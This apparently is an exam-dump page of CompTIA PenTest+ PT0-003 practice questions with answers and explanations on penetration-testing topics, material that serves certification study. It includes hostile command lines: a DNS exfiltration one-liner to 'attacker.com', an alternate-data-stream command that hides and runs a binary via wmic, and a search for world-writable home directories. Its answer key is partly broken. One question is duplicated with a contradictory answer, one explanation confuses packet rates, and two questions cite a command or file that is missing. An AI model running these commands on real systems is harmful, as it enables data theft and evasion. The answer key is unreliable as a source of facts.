[Jun-2026] Pass CompTIA PT0-003 Tests Engine pdf - All Free Dumps [Q99-Q123]


CompTIA PT0-003 Exam Syllabus Topics:

Topic 1: Reconnaissance and Enumeration
  • This topic focuses on applying information gathering and enumeration techniques. Cybersecurity analysts will learn how to modify scripts for reconnaissance and enumeration purposes. They will also understand which tools to use for these stages, essential for gathering crucial information before performing deeper penetration tests.
Topic 2: Engagement Management
  • In this topic, cybersecurity analysts learn about pre-engagement activities, collaboration, and communication in a penetration testing environment. The topic covers testing frameworks, methodologies, and penetration test reports. It also explains how to analyze findings and recommend remediation effectively within reports, crucial for real-world testing scenarios.
Topic 3: Post-exploitation and Lateral Movement
  • Cybersecurity analysts will gain skills in establishing and maintaining persistence within a system. This topic also covers lateral movement within an environment and introduces concepts of staging and exfiltration. Lastly, it highlights cleanup and restoration activities, ensuring analysts understand the post-exploitation phase's responsibilities.
Topic 4: Vulnerability Discovery and Analysis
  • In this section, cybersecurity analysts will learn various techniques to discover vulnerabilities. Analysts will also analyze data from the reconnaissance, scanning, and enumeration phases to identify threats. Additionally, it covers physical security concepts, enabling analysts to understand security gaps beyond just the digital landscape.
Topic 5: Attacks and Exploits
  • This extensive topic trains cybersecurity analysts to analyze data and prioritize attacks. Analysts will learn how to conduct network, authentication, host-based, web application, cloud, wireless, and social engineering attacks using appropriate tools. Understanding specialized systems and automating attacks with scripting will also be emphasized.


NEW QUESTION # 99
As part of active reconnaissance, penetration testers need to determine whether a protection mechanism is in place to safeguard the target's website against web application attacks. Which of the following methods would be the most suitable?

  • A. Scapy packet crafting
  • B. Direct-to-origin testing
  • C. Antivirus scanning
  • D. WAF detection

Answer: D

Explanation:
Detecting a Web Application Firewall (WAF) helps penetration testers understand the protective measures in place and tailor their testing methods to bypass these defenses.


NEW QUESTION # 100
A penetration tester completes a scan and sees the following Nmap output on a host:
Nmap scan report for victim (10.10.10.10)
Host is up (0.0001s latency)
PORT STATE SERVICE
161/udp open snmp
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
Running Microsoft Windows 7
OS CPE: cpe:/o:microsoft:windows_7::sp0
The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

  • A. exploit/windows/smb/ms17_010_eternalblue
  • B. exploit/windows/smb/psexec
  • C. auxiliary/scanner/snmp/snmp_login
  • D. exploit/windows/smb/ms08_067_netapi

Answer: A

Explanation:
Since the system is running Windows 7 SP0, it is highly likely to be vulnerable to MS17-010 (EternalBlue), a critical SMBv1 vulnerability that allows remote code execution (RCE).
Option A (ms17_010_eternalblue) ✅: Correct. EternalBlue allows remote exploitation of SMBv1 on Windows 7/Server 2008 without valid credentials.
Option B (psexec) ❌: PsExec requires valid credentials, which the tester does not have yet.
Option C (snmp_login scanner) ❌: Only checks for default SNMP credentials; it is an auxiliary scanner, not an exploit.
Option D (ms08_067_netapi) ❌: MS08-067 targets Windows XP/Server 2003, but the system is Windows 7.
Reference: CompTIA PenTest+ PT0-003 Official Guide - SMB Exploitation & EternalBlue


NEW QUESTION # 101
During a penetration testing exercise, a team decides to use a watering hole strategy. Which of the following is the most effective approach for executing this attack?

  • A. Create fake social media profiles to befriend employees.
  • B. Send phishing emails to the organization's employees.
  • C. Compromise a website frequently visited by the organization's employees.
  • D. Launch a DDoS attack on the organization's website.

Answer: C

Explanation:
Watering Hole Attack Explanation:
A watering hole attack involves compromising a website that the target frequently visits.
The attacker injects malicious code into the site, which then exploits users who access it.
Why Not Other Options?
A: Creating fake social media profiles is social engineering, which may be effective but is not a watering hole attack.
B: Phishing is unrelated to compromising trusted websites.
D: DDoS attacks disrupt services but do not align with the watering hole strategy.
CompTIA Pentest+ Reference:
Domain 3.0 (Attacks and Exploits)


NEW QUESTION # 102
Which of the following tools would help a penetration tester locate a file that was uploaded to a content management system?

  • A. DirBuster
  • B. CeWL
  • C. Open VAS
  • D. Scout Suite

Answer: A

Explanation:
DirBuster is a tool that can brute-force directories and filenames on web servers. It can help a penetration tester locate a file that was uploaded to a content management system by trying different combinations of paths and names until it finds a match. DirBuster can also use wordlists to speed up the process and discover hidden files or directories. References: The Official CompTIA PenTest+ Instructor Guide (Exam PT0-002) eBook, page 156


NEW QUESTION # 103
A CentOS computer was exploited during a penetration test. During initial reconnaissance, the penetration tester discovered that port 25 was open on an internal Sendmail server. To remain stealthy, the tester ran the following command from the attack machine:

Which of the following would be the BEST command to use for further progress into the targeted network?

  • A. ssh 127.0.0.1 5555
  • B. ssh 10.10.1.2
  • C. nc 127.0.0.1 5555
  • D. nc 10.10.1.2

Answer: C


NEW QUESTION # 104
During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?

  • A. theHarvester
  • B. Censys.io
  • C. WHOIS
  • D. WiGLE.net

Answer: B

Explanation:
Censys.io is a powerful reconnaissance tool that scans the internet and provides detailed information about exposed services, certificates, and GeoIP data.
Option A (theHarvester) ❌: Used for OSINT, mainly to collect emails, subdomains, and usernames.
Option C (WHOIS) ❌: Provides domain registration information, not GeoIP data or service summaries.
Option D (WiGLE.net) ❌: Used for wireless network mapping, not host discovery.
Option B (Censys.io) ✅: Correct. Censys provides:
  • GeoIP data (location of hosts).
  • Exposed services and open ports.
  • TLS certificate analysis.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Reconnaissance and OSINT Tools


NEW QUESTION # 105
A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.
Which of the following commands should the engineer use to achieve the objective in the least amount of time?

  • A. nmap -T3 -p 80 10.0.0.0/16 --max-hostgroup 100
  • B. nmap -T5 -p 80 10.0.0.0/16 --min-rate 80
  • C. nmap -T0 -p 80 10.0.0.0/16
  • D. nmap -T4 -p 80 10.0.0.0/16 --max-rate 60

Answer: D

Explanation:
The nmap -T4 -p 80 10.0.0.0/16 --max-rate 60 command is used to scan the 10.0.0.0/16 subnet for web servers (port 80) at a maximum rate of 60 packets per minute. The -T4 option sets the timing template to "aggressive", which speeds up the scan. The --max-rate option limits the number of packets sent per second, helping to bypass the network IPS that isolates the source when the scan exceeds 100 packets per minute.
References: Nmap commands


NEW QUESTION # 106
A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

  • A. Browser Exploitation Framework
  • B. theHarvester
  • C. Metasploit
  • D. Maltego

Answer: A

Explanation:
Cross-Site Request Forgery (CSRF) vulnerabilities can be leveraged to trick authenticated users into performing unwanted actions on a web application. The right tool for this task would help in exploiting web-based vulnerabilities, particularly those related to web browsers and interactions.
Browser Exploitation Framework (BeEF):
BeEF is a powerful tool specifically designed for exploiting web browser vulnerabilities. It can hook web browsers and perform a wide range of attacks, including CSRF.
Capabilities: BeEF is equipped with modules to create CSRF attacks, capture session tokens, and gather sensitive information from the target user's browser session.
References: BeEF is widely used in penetration testing for its extensive capabilities in exploiting web application vulnerabilities and manipulating browser sessions.
Maltego (Option D):
Explanation: Maltego is an open-source intelligence (OSINT) tool used for information gathering and visualizing relationships between data.
Drawbacks: While useful for reconnaissance, Maltego is not designed for exploiting web vulnerabilities like CSRF.
Metasploit (Option C):
Explanation: Metasploit is a versatile exploitation framework that can be used for various types of penetration testing tasks, including web application exploitation.
Capabilities: While Metasploit can exploit some web vulnerabilities, it is not specifically tailored for CSRF attacks as effectively as BeEF.
References: Metasploit's strength lies in its comprehensive exploitation modules, but for specific browser-based attacks, BeEF is more focused and effective.
theHarvester (Option B):
Explanation: theHarvester is a tool for gathering open-source intelligence (OSINT) about a target, primarily used for reconnaissance.
Drawbacks: It does not provide capabilities for exploiting CSRF vulnerabilities.
Conclusion: The Browser Exploitation Framework (BeEF) is the most suitable tool for leveraging a CSRF vulnerability to gather sensitive details from an application's end users. It is specifically designed for browser-based exploitation, making it the best choice for this task.


NEW QUESTION # 107
A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following:
SeAssignPrimaryTokenPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeManageVolumePrivilege Enabled
SeImpersonatePrivilege Enabled
SeCreateGlobalPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
Which of the following privileges should the tester use to achieve the goal?

  • A. SeImpersonatePrivilege
  • B. SeCreateGlobalPrivilege
  • C. SeChangeNotifyPrivilege
  • D. SeManageVolumePrivilege

Answer: A

Explanation:
The SeImpersonatePrivilege allows a process to impersonate another user's security context, which is commonly used in token manipulation attacks for privilege escalation.
Option A (SeImpersonatePrivilege) ✅: Correct.
Used in Juicy Potato or Rogue Potato attacks to escalate privileges.
Option B (SeCreateGlobalPrivilege) ❌: Allows creating global objects, but not privilege escalation.
Option C (SeChangeNotifyPrivilege) ❌: Enables traverse directory access, not privilege escalation.
Option D (SeManageVolumePrivilege) ❌: Used for disk management, not privilege escalation.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Windows Privilege Escalation via Token Impersonation


NEW QUESTION # 108
Which of the following describes an attack where authentication tokens are captured and reused to impersonate users in a system using OpenID Connect (OIDC) with OAuth?

  • A. A brute-force attack against the authentication system
  • B. A password-spraying attack against the authentication system
  • C. A mask attack against the authentication system
  • D. A replay attack against the authentication flow in the system

Answer: D

Explanation:
OpenID Connect (OIDC) with OAuth allows applications to authenticate users using third-party identity providers (IdPs). If dynamic registration is enabled, attackers can abuse this feature to capture and replay authentication requests.
* Replay attack (Option D):
* Attackers capture legitimate authentication tokens and reuse them to impersonate users.
* OIDC uses JWTs (JSON Web Tokens), which may not expire quickly, making replay attacks highly effective.


NEW QUESTION # 109
A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. PsExec

Answer: A

Explanation:
Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using various tools or commands, such as the command prompt, PowerShell, or Sysinternals. For example, the following command creates an ADS named secret.exe in a file named test.txt and runs it using the wmic.exe process call create function: type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe /c test.txt:secret.exe"


NEW QUESTION # 110
During an internal penetration test, a tester compromises a Windows OS-based endpoint and bypasses the defensive mechanisms. The tester also discovers that the endpoint is part of an Active Directory (AD) local domain.
The tester's main goal is to leverage credentials to authenticate into other systems within the Active Directory environment.
Which of the following steps should the tester take to complete the goal?

  • A. Use Metasploit to create and execute a payload and try to upload the payload into other systems
  • B. Use Mimikatz to collect information about the accounts and try to authenticate in other systems
  • C. Use Evil-WinRM to access other systems in the network with the endpoint credentials
  • D. Use Hashcat to crack a password for the local user on the compromised endpoint

Answer: B

Explanation:
Since the tester has compromised a Windows machine and bypassed security, the best next step is to extract credentials from memory to move laterally within Active Directory.
Option B (Mimikatz) ✅: Correct.
Mimikatz extracts hashed credentials, plaintext passwords, and Kerberos tickets from memory.
Attackers use Pass-the-Hash (PtH) or Pass-the-Ticket (PtT) to authenticate on other systems without cracking passwords.
Option D (Hashcat) ❌: Cracking passwords takes time and is not necessary if Mimikatz provides reusable credentials.
Option C (Evil-WinRM) ❌: Evil-WinRM is useful for remotely executing commands, but without valid credentials it won't work.
Option A (Metasploit) ❌: Metasploit payloads may be useful for initial exploitation, but credential dumping is a better next step.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Credential Dumping & Lateral Movement


NEW QUESTION # 111
Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?

  • A. Third-party authorization
  • B. Internal team authorization
  • C. Customer authorization
  • D. Penetration tester authorization

Answer: C

Explanation:
Before any penetration testing begins, especially in a complex IT infrastructure involving multiple systems, cloud environments, and potentially shared platforms, a formal written authorization from the customer (client organization) is mandatory.
This authorization defines the scope, targets, timeframes, and limitations of the assessment and ensures legal protection for both the tester and the organization. Conducting testing without explicit client authorization could violate laws (e.g., the Computer Fraud and Abuse Act in the U.S.) and corporate policies.
Why not the others:
* D. Penetration tester authorization: The tester cannot authorize their own actions; authorization must come from the system owner.
* A. Third-party authorization: Only relevant if the third party owns the infrastructure; otherwise, it's not mandatory.
* B. Internal team authorization: Internal teams may coordinate logistics, but legal authorization must come from the customer/asset owner.
CompTIA PT0-003 Objective Mapping:
* Domain 1.0: Planning and Scoping
* 1.2: Explain legal concepts, authorization requirements, and rules of engagement prior to testing.


NEW QUESTION # 112
A penetration tester is conducting reconnaissance for an upcoming assessment of a large corporate client. The client authorized spear phishing in the rules of engagement. Which of the following should the tester do first when developing the phishing campaign?

  • A. Shoulder surfing
  • B. Recon-ng
  • C. Password dumps
  • D. Social media

Answer: D

Explanation:
When developing a phishing campaign, the tester should first use social media to gather information about the targets.
* Social Media:
* Purpose: Social media platforms like LinkedIn, Facebook, and Twitter provide valuable information about individuals, including their job roles, contact details, interests, and connections.
* Reconnaissance: This information helps craft convincing and targeted phishing emails, increasing the likelihood of success.
* Process:
* Gathering Information: Collect details about the target employees, such as their names, job titles, email addresses, and any personal information that can make the phishing email more credible.
* Crafting Phishing Emails: Use the gathered information to personalize phishing emails, making them appear legitimate and relevant to the recipients.
* Other Options:
* Shoulder Surfing: Observing someone's screen or keyboard input to gain information, not suitable for gathering broad information for a phishing campaign.
* Recon-ng: A tool for automated reconnaissance, useful but more general. Social media is specifically targeted for gathering personal information.
* Password Dumps: Using previously leaked passwords to find potential targets is more invasive and less relevant to the initial stage of developing a phishing campaign.
Pentest References:
* Spear Phishing: A targeted phishing attack aimed at specific individuals, using personal information to increase the credibility of the email.
* OSINT (Open Source Intelligence): Leveraging publicly available information to gather intelligence on targets, including through social media.
By starting with social media, the penetration tester can collect detailed and personalized information about the targets, which is essential for creating an effective spear phishing campaign.


NEW QUESTION # 113
A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output:
SeAssignPrimaryTokenPrivilege Disabled
SeIncreaseQuotaPrivilege Disabled
SeChangeNotifyPrivilege Enabled
SeManageVolumePrivilege Enabled
SeImpersonatePrivilege Enabled
SeCreateGlobalPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
Which of the following privileges should the tester use to achieve the goal?

  • A. SeImpersonatePrivilege
  • B. SeChangeNotifyPrivilege
  • C. SeCreateGlobalPrivilege
  • D. SeManageVolumePrivilege

Answer: C

Explanation:
SeImpersonatePrivilege for Escalation:
The SeImpersonatePrivilege allows a process to impersonate a user after authentication. This is a common privilege used in token stealing or pass-the-token attacks to escalate privileges.
Exploits like Rotten Potato and Juicy Potato specifically target this privilege to elevate access to SYSTEM.
Why Not Other Options?
C (SeCreateGlobalPrivilege): This allows processes to create global objects but does not directly enable privilege escalation.
B (SeChangeNotifyPrivilege): This is related to bypassing traverse checking and does not facilitate privilege escalation.
D (SeManageVolumePrivilege): This allows volume maintenance but is not relevant for privilege escalation.
CompTIA Pentest+ References:
Domain 3.0 (Attacks and Exploits)


NEW QUESTION # 114
A penetration tester needs to scan a remote infrastructure with Nmap. The tester issues the following command:
nmap 10.10.1.0/24
Which of the following is the number of TCP ports that will be scanned?

  • A. 65,535
  • B. 0
  • C. 1,000
  • D. 1,024

Answer: C

Explanation:
By default, Nmap scans the top 1,000 most commonly used TCP ports unless otherwise specified.
* Option C (1,000) ✅: Correct. Nmap defaults to scanning the 1,000 most common TCP ports unless the -p flag is used to specify a different range.
* Option D (1,024) ❌: Incorrect. The first 1,024 ports are the well-known ports, but Nmap scans 1,000 by default, not 1,024.
* Option A (65,535) ❌: Incorrect. Nmap only scans all ports if the -p- flag is used (e.g., nmap -p- <target>).
* 256 ❌: This is the number of hosts in the /24 subnet, not the number of ports scanned.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Network Scanning with Nmap


NEW QUESTION # 115
A penetration tester exploited a unique flaw on a recent penetration test of a bank. After the test was completed, the tester posted information about the exploit online along with the IP addresses of the exploited machines. Which of the following documents could hold the penetration tester accountable for this action?

  • A. SLA
  • B. MSA
  • C. NDA
  • D. ROE

Answer: C


NEW QUESTION # 116
During a security assessment, a penetration tester captures plaintext login credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access.
Which of the following tools is the tester using?

  • A. Metasploit
  • B. Wireshark
  • C. Zed Attack Proxy (ZAP)
  • D. Burp Suite

Answer: B

Explanation:
Capturing plaintext credentials in network traffic is done using packet sniffing. Wireshark is the best tool for this task.
* Option D (Burp Suite) ❌: Used for web application testing and intercepting HTTPS traffic, but not general network sniffing.
* Option B (Wireshark) ✅: Correct.
* Wireshark is a packet analysis tool that captures unencrypted network traffic, including plaintext credentials.
* Option C (ZAP - Zed Attack Proxy) ❌: Similar to Burp Suite, but focused on web application security, not network packet capture.
* Option A (Metasploit) ❌: Metasploit is used for exploitation rather than capturing traffic.
Reference: CompTIA PenTest+ PT0-003 Official Guide - Packet Sniffing & Network Traffic Analysis


NEW QUESTION # 117
A penetration tester aims to exploit a vulnerability in a wireless network that lacks proper encryption. The lack of proper encryption allows malicious content to infiltrate the network. Which of the following techniques would most likely achieve the goal?

  • A. Packet injection
  • B. Bluejacking
  • C. Beacon flooding
  • D. Signal jamming

Answer: A

Explanation:
If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.
* Packet injection (Option A):
* Attackers forge and transmit fake packets to manipulate network behavior.
* Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.


NEW QUESTION # 118
A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

  • A. Padding the data and uploading the files through an external cloud storage service.
  • B. Hashing the data and emailing the files to the tester's company inbox.
  • C. Encoding the data and pushing through DNS to the tester's controlled server.
  • D. Obfuscating the data and pushing through FTP to the tester's controlled server.

Answer: C

Explanation:
DLP (Data Loss Prevention) systems monitor and block sensitive data transfers over HTTP, FTP, Email, and removable devices.
Encoding the data and exfiltrating through DNS (Option C):
DNS is often overlooked by DLP systems because it is required for network functionality.
Attackers use DNS tunneling (e.g., dnscat2, iodine) to exfiltrate data inside DNS queries.
Example method:
echo "Sensitive Data" | base64 | nslookup -q=TXT attacker.com
Incorrect options:
Option A (Cloud storage): Many organizations monitor file uploads to cloud storage.
Option D (FTP): FTP is easily monitored and flagged by DLP solutions.
Option B (Hashing and emailing): Emails are actively scanned by DLP policies.


NEW QUESTION # 119
User credentials were captured from a database during an assessment and cracked using rainbow tables.
Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

  • A. bcrypt
  • B. PBKDF2
  • C. SHA-1
  • D. MD5

Answer: D

Explanation:
Reference: https://www.geeksforgeeks.org/understanding-rainbow-table-attack/


NEW QUESTION # 120
A penetration tester gives the following command to a systems administrator to execute on one of the target servers:
rm -f /var/www/html/G679h32gYu.php
Which of the following BEST explains why the penetration tester wants this command executed?

  • A. To remove a web shell after the penetration test
  • B. To trick the systems administrator into installing a rootkit
  • C. To close down a reverse shell
  • D. To delete credentials the tester created

Answer: A

Explanation:
A web shell is a malicious script that allows remote access and control of a web server. A penetration tester may use a web shell to execute commands on the target server during a penetration test. However, after the test is completed, the penetration tester should remove the web shell to avoid leaving any traces or backdoors on the server. The command rm -f /var/www/html/G679h32gYu.php deletes the file G679h32gYu.php from the web server's document root directory, which is likely the location of the web shell. The other options are not plausible explanations for why the penetration tester wants this command executed.


NEW QUESTION # 122
The following file was obtained during reconnaissance:

Which of the following is most likely to be successful if a penetration tester achieves non-privileged user access?

  • A. Exposure of other users' sensitive data
  • B. Hijacking the default user login shells
  • C. Corrupting the skeleton configuration file
  • D. Unauthorized access to execute binaries via sudo

Answer: A

Explanation:
DIR_MODE=0777 configures new home directories to be created world-readable, world-writable, and world-executable (rwxrwxrwx). With such permissive permissions, any unprivileged local user can traverse into other users' home directories, list files, read them, and even modify or replace them. That makes exposure of other users' sensitive data the most likely and immediate outcome once the tester has any local user account.
Why the other options are less likely:
D. Unauthorized sudo execution: Requires membership in sudo/wheel or explicit entries in /etc/sudoers. Nothing in the snippet indicates that, and the file mode on home directories doesn't grant sudo.
B. Hijacking default login shells: DSHELL=/bin/zsh only sets the default shell for new users. Replacing /bin/zsh or altering /etc/passwd would require root.
C. Corrupting the skeleton configuration: SKEL=/etc/systemd-conf/temp-skeleton is under /etc/..., which is root-owned on standard systems. A normal user cannot write there, so "corrupting the skeleton" is unlikely without privilege escalation.
Practical exploitation as a non-privileged user (illustrative):
# Find world-writable homes
find /home -maxdepth 1 -type d -perm -0002 -ls
# Read another user's files
cd /home/targetuser && ls -la && cat Documents/tax_return.pdf
(Depending on per-file permissions.)
CompTIA PenTest+ PT0-003 Objective Mapping (for study):
Domain 3.0 Attacks and Exploits

